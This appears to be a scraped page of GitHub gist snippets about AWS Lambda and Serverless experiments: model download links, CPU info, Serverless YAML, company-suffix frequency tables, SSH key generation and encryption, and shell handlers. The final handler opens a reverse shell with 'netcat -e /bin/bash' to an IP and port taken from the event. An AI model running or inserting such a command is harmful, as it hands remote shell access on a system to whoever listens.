This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://models-to-download-randomwordsstringedtogether.s3-ap-southeast-1.amazonaws.com/yolov3.weights |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://drive.google.com/file/d/1BZCKj_e_SXxlvg4rKUC0EI4BJXYssTVL/view?usp=sharing | |
https://s3-ap-southeast-1.amazonaws.com/p40.123456/tf-bert-large-cased-ner.zip |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
processor : 0 | |
vendor_id : GenuineIntel | |
cpu family : 6 | |
model : 62 | |
model name : Intel(R) Xeon(R) Processor @ 2.50GHz | |
stepping : 4 | |
microcode : 0x1 | |
cpu MHz : 2500.010 | |
cache size : 33792 KB | |
physical id : 0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
service: demo | |
provider: | |
name: aws | |
region: ap-southeast-1 | |
runtime: python3.7 | |
functions: | |
hello: | |
handler: hello.main |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
freq | suffix_1 | |
---|---|---|
108465 | LIMITED | |
86572 | LLC | |
80976 | B.V. | |
59102 | GMBH | |
49047 | S.R.L. | |
47995 | TRUST | |
45094 | FUND | |
43464 | INC. | |
36573 | AB |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
freq suffix_2 | |
100 2000 S.R.L. | |
100 CONSULTING AG | |
100 INVESTMENT CORP. | |
100 VERMÖGENSVERWALTUNG KG | |
100 ZEALAND LIMITED | |
101 1 AB | |
101 AALBORG APS | |
101 AUSTRALIA LIMITED | |
101 HEDGE FUND |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
mkdir key_gen/$1 | |
cd key_gen/$1 | |
ssh-keygen -t rsa -b 4096 -f key_gen/github_id_rsa -C [email protected] | |
openssl rand -base64 -out key_gen/secret.key 48 | |
key=$(<key_gen/secret.key) | |
openssl aes-256-cbc -e -in key_gen/github_id_rsa -out key_gen/github_id_rsa.enc -k $key | |
openssl aes-256-cbc -d -in key_gen/github_id_rsa.enc -out key_gen/github_id_rsa.dec -k $key |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
publish_github: | |
handler: publish_to_github.handler | |
runtime: provided | |
memorySize: 2048 | |
timeout: 600 | |
environment: | |
GITHUB_REPO: ${self:custom.githubRepo} | |
KEK_PARAMETER: ${self:custom.kekParameter} | |
S3_KEYS: ${self:custom.s3KeysName} | |
BUCKET_NAME: ${self:custom.s3LayersName} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
handler () { | |
set -e | |
SSH_KEY_DIR=/tmp/.ssh | |
SSH_KEY_FILE=$SSH_KEY_DIR/id_rsa | |
KNOWN_HOSTS_FILE=/tmp/.ssh/known_hosts | |
if [ ! -d $SSH_KEY_DIR ]; | |
then | |
mkdir $SSH_KEY_DIR |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
handler () { | |
set -e | |
EVENT_JSON=$(echo $1 | jq .) | |
IP=$(jq -r '.ip' <<< "${EVENT_JSON}") | |
PORT=$(jq -r '.port' <<< "${EVENT_JSON}") | |
echo "Creating reverse shell to $IP:$PORT" | |
netcat -e /bin/bash $IP $PORT |